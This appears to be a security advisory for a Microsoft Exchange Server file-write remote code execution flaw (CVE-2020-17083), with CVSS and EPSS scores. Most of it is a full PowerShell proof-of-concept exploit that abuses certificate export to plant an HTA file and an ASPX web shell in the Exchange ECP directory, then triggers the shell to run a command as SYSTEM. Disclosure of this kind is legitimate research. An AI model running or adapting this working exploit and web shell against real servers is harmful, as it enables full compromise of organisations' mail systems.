SRC-2020-0025 : Microsoft Exchange Server ExportExchangeCertificate WriteCertiricate File Write Remote Code Execution Vulnerability

2020-06-0400:00:00

Steven Seeley (mr_me) of Qihoo 360 Vulcan Team

srcincite.io

5.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L

3.5 Low

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.013 Low

EPSS

Percentile

85.7%

JSON

Vulnerability Details:

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exchange Server. Authentication with the “Exchange Server Certificates” role is required to exploit this vulnerability.

The specific flaw exists within the WriteCertiricate function during the processing of the Export-ExchangeCertificate cmdlet. The issue results from the lack of proper validation of user-supplied data when writing files. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.

Affected Vendors:

Microsoft

Affected Products:

Exchange Server

Vendor Response:

Microsoft has issued an update to correct this vulnerability. More details can be found at:
<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17083>

# Microsoft Exchange Server ExportExchangeCertificate WriteCertiricate File Write Remote Code Execution Vulnerability
# Patch: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17083
# CVSS v3: 9.1 (/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C)
# 
# Notes:
#
# The (ab)user needs the "Exchange Server Certificates" role assigned
# [PS] C:\Windows\system32>New-RoleGroup -Name "cert users" -Roles "Exchange Server Certificates" -Members "harryh"
# 
# Name       AssignedRoles                  RoleAssignments                           ManagedBy
# ----       -------------                  ---------------                           ---------
# cert users {Exchange Server Certificates} {Exchange Server Certificates-cert users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/Admin}
# 
#
# [PS] C:\Windows\system32>Get-RoleGroup "cert users" | Format-List
#
#
# RunspaceId                  : a97d7e2c-d036-4bfc-b95c-4fabcb644160
# ManagedBy                   : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/Admin}
# RoleAssignments             : {Exchange Server Certificates-cert users}
# Roles                       : {Exchange Server Certificates}
# DisplayName                 :
# ExternalDirectoryObjectId   :
# Members                     : {exchangedemo.com/Users/Harry Houdini}
# SamAccountName              : cert users
# Description                 :
# RoleGroupType               : Standard
# LinkedGroup                 :
# Capabilities                : {}
# LinkedPartnerGroupId        :
# LinkedPartnerOrganizationId :
# Identity                    : exchangedemo.com/Microsoft Exchange Security Groups/cert users
# IsValid                     : True
# ExchangeVersion             : 0.10 (14.0.100.0)
# Name                        : cert users
# DistinguishedName           : CN=cert users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com
# Guid                        : 6fb0b860-2cc2-4fe1-9489-d93dbbed8c9f
# ObjectCategory              : exchangedemo.com/Configuration/Schema/Group
# ObjectClass                 : {top, group}
# WhenChanged                 : 6/12/2020 4:15:54 AM
# WhenCreated                 : 6/12/2020 1:34:51 AM
# WhenChangedUTC              : 6/11/2020 8:15:54 PM
# WhenCreatedUTC              : 6/11/2020 5:34:51 PM
# OrganizationId              :
# Id                          : exchangedemo.com/Microsoft Exchange Security Groups/cert users
# OriginatingServer           : DEAD01.exchangedemo.com
# ObjectState                 : Changed
#
# Example:
#
# PS C:\Users\researcher> .\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr [email protected] -pwd user123### -cmd mspaint
# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with [email protected]:user123###
# (+) wrote to target file C:/Windows/Temp/rXq1U2tD.hta
# (+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/4VFQwc7W.aspx
# (+) shell written, executing command...
# (+) executed mspaint as SYSTEM!
# PS C:\Users\researcher>

param (
    [Parameter(Mandatory=$true)][string]$server,
    [Parameter(Mandatory=$true)][string]$usr,
    [Parameter(Mandatory=$true)][string]$pwd,
    [string]$cmd = "mspaint"
)
 
Function Get-RandomAlphanumericString {
    [CmdletBinding()]
    Param (
        [int] $length = 8
    )
    Process{
        Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length  | % {[char]$_}) )
    }    
}

function Writebad-File{
    Param (
        [string] $fn,
        [string] $content,
        [System.Management.Automation.Runspaces.PSSession] $session
    )
    $selector = Get-RandomAlphanumericString
    Invoke-Command -Session $session -ScriptBlock {
        New-ExchangeCertificate -BinaryEncoded -GenerateRequest -SubjectName "c=$Using:selector,o=$Using:content,cn=si"
    } | Out-Null
    $thumb = Invoke-Command -Session $session -ScriptBlock {
         Get-ExchangeCertificate 
    } | Where-Object -Property Subject -like "*c=$selector*" | select-object -Expand Thumbprint

    # this is where the file write is for this bug
    Invoke-Command -Session $session -ScriptBlock {
         Export-ExchangeCertificate -Thumbprint $Using:thumb -FileName $Using:fn -BinaryEncoded;
    } | Out-Null
}
function Exploit-Exchange {
    Param (
        [string] $server,
        [string] $usr,
        [string] $pwd,
        [string] $cmd
    )
    "(+) targeting $server with ${usr}:$pwd"
    $securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)
    $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds
    $hta = Get-RandomAlphanumericString
    $aspx = Get-RandomAlphanumericString
    
    # write a hta file with commands
    Writebad-File -fn "C:/Windows/Temp/$hta.hta" -content "" -session $s
    "(+) wrote to target file C:/Windows/Temp/$hta.hta" 
    
    # write aspx file
    Writebad-File -fn "C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx" -content "<%=System.Diagnostics.Process.Start(Request[Request.HttpMethod])%>" -session $s
    "(+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx" 
    "(+) shell written, executing command..."
    $b = @{
        destination = "https://$server/ecp/$aspx.aspx?GET=C:/Windows/Temp/$hta.hta"
        flags = ''
        username = $usr
        password = $pwd
    }
    $r = Invoke-WebRequest "https://$server/owa/auth.owa" -SessionVariable 'websess' -Body $b -Method 'POST' | Select-Object -Expand Forms
    if ([string]::IsNullOrWhiteSpace($r)) {
        "(+) executed $cmd as SYSTEM!"
    } else {
        "(-) exploit failed"
    }    
}

Get-PSSession | Remove-PSSession
Exploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd